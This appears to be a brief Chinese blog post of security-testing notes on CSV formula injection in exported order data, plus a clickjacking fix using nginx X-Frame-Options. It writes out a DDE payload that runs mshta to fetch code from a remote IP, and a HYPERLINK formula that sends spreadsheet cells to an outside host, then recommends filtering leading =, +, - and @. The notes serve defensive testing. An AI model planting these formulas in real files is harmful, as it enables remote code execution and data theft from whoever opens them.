安全测试 csv 注入

  1. csv 注入
    用户下单时,收货人姓名为 =cmd|A1!A1 ,下单后 在订单系统可导出订单到csv , 则=cmd|A1!A1 则在csv 的收货人列中的某单元格中, 是可以触发打开cmd 的,黑客是可以通过cmd 做一些危险操作,比如: =+1+cmd|’/c mshta.exehttp://192.168.233.102:8080/a’!A0
    =HYPERLINK(“http://vps_ip?test=”&A2&A3,“Error: Please click me!”) 这种 可把csv 中的数据泄露
    方案: 输入文本中=,+,-,@ 需要过滤

  2. 点击挟持:ngnix 增加X-frame-options :always 配置 确保不会出现iframe 覆盖页面,篡改点击请求

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值